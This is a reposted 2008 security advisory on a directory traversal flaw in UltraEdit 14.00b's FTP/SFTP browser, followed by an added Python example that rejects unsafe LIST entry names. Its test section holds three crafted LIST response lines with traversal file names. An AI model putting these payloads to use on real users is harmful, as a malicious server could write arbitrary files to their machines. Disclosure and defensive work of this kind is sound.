UltraEdit FTP/SFTP LIST Command Directory Traversal Vulnerability

Posted by ArtHack on Jun 23rd, 2008 and filed under Notice loopholes.

Affected systems:
IDM Computer Solutions UltraEdit 14.00b
Description:
--------------------------------------------------------------------------------
BUGTRAQ ID: 29784
UltraEdit is a multi-purpose editor for HTML, hex text and programming languages such as PHP and Perl.
The FTP/SFTP browser built into UltraEdit does not correctly filter slashes and backslashes from the file names an FTP server returns in response to the LIST command. If a user is tricked into downloading an entire directory from such a server, files can be written to arbitrary locations on the user's machine.
<*Source: Tan Chew Keong (chewkeong@security.org.sg)

Links: http://secunia.com/advisories/30749/ http://vuln.sg/ultraedit1400b-en.html*>
Test method:
--------------------------------------------------------------------------------
Warning
The following program (method) may be offensive in nature and is provided solely for security research and teaching. Users bear the risk themselves!
-rw-r--r--    1 ftp      ftp            20 Mar 01 05:37 \..\..\..\..\..\..\..\..\..\testfile.txt\r\n
-rw-r--r--    1 ftp      ftp            20 Mar 01 05:37 /../../../../../../../../../testfile.txt\r\n
-rw-r--r--    1 ftp      ftp            20 Mar 01 05:37 ../..\/..\/..\/../..\/../..\/../testfile.txt\r\n
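As an added defensive example (not part of the original advisory or of UltraEdit's code), the following Python parses Unix-style LIST lines and rejects any server-supplied entry name that is not a single path component under both POSIX and Windows rules, so entries like the three above are skipped instead of being joined onto the download directory. The listing, the regular expression and the base directory are constructed assumptions for the example.

```python
import re
from pathlib import PurePosixPath, PureWindowsPath

# Constructed LIST responses modelled on the advisory's test lines, plus one benign entry.
SAMPLE_LISTING = (
    "-rw-r--r--    1 ftp      ftp            20 Mar 01 05:37 \\..\\..\\..\\..\\testfile.txt\r\n"
    "-rw-r--r--    1 ftp      ftp            20 Mar 01 05:37 /../../../../testfile.txt\r\n"
    "-rw-r--r--    1 ftp      ftp            20 Mar 01 05:37 ../..\\/..\\/../testfile.txt\r\n"
    "-rw-r--r--    1 ftp      ftp          1024 Mar 01 05:37 readme.txt\r\n"
)

# Unix-style LIST line: perms, link count, owner, group, size, month, day, time-or-year, name.
# Assumed format; real servers vary and a production client needs a more tolerant parser.
LIST_LINE = re.compile(
    r"^([-dl][rwxsStT-]{9})\s+\d+\s+\S+\s+\S+\s+(\d+)\s+"
    r"[A-Za-z]{3}\s+\d{1,2}\s+(?:\d{2}:\d{2}|\d{4})\s+(.+)$"
)


def parse_list_line(line):
    """Return (is_dir, size, name) for one LIST line, or None if it does not parse."""
    m = LIST_LINE.match(line.rstrip("\r\n"))
    if not m:
        return None
    perms, size, name = m.groups()
    return perms.startswith("d"), int(size), name


def is_safe_entry_name(name):
    """Accept only a single path component: no '/', no '\\' (a Windows client
    treats both as separators), no '.'/'..', no drive prefix, no control chars."""
    if not name or any(ord(c) < 0x20 for c in name):
        return False
    if "/" in name or "\\" in name:
        return False
    for cls in (PurePosixPath, PureWindowsPath):
        p = cls(name)
        # anchor catches 'C:' style prefixes; parts catches '.' (empty) and '..'.
        if p.anchor or len(p.parts) != 1 or p.parts[0] in (".", ".."):
            return False
    return True


def plan_downloads(listing, base_dir):
    """Map each parsed LIST entry to a local path under base_dir, or None when
    the name is rejected (the client must skip it rather than try to sanitise it)."""
    plan = []
    for line in listing.splitlines():
        parsed = parse_list_line(line)
        if parsed is None:
            continue
        _is_dir, _size, name = parsed
        local = str(PurePosixPath(base_dir) / name) if is_safe_entry_name(name) else None
        plan.append((name, local))
    return plan
```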
Recommendation:
--------------------------------------------------------------------------------
Vendor patch:
IDM Computer Solutions
----------------------
The vendor has released an upgrade patch to fix this security issue; please download it from the vendor's home page:
http://www.ultraedit.com/products/index.html
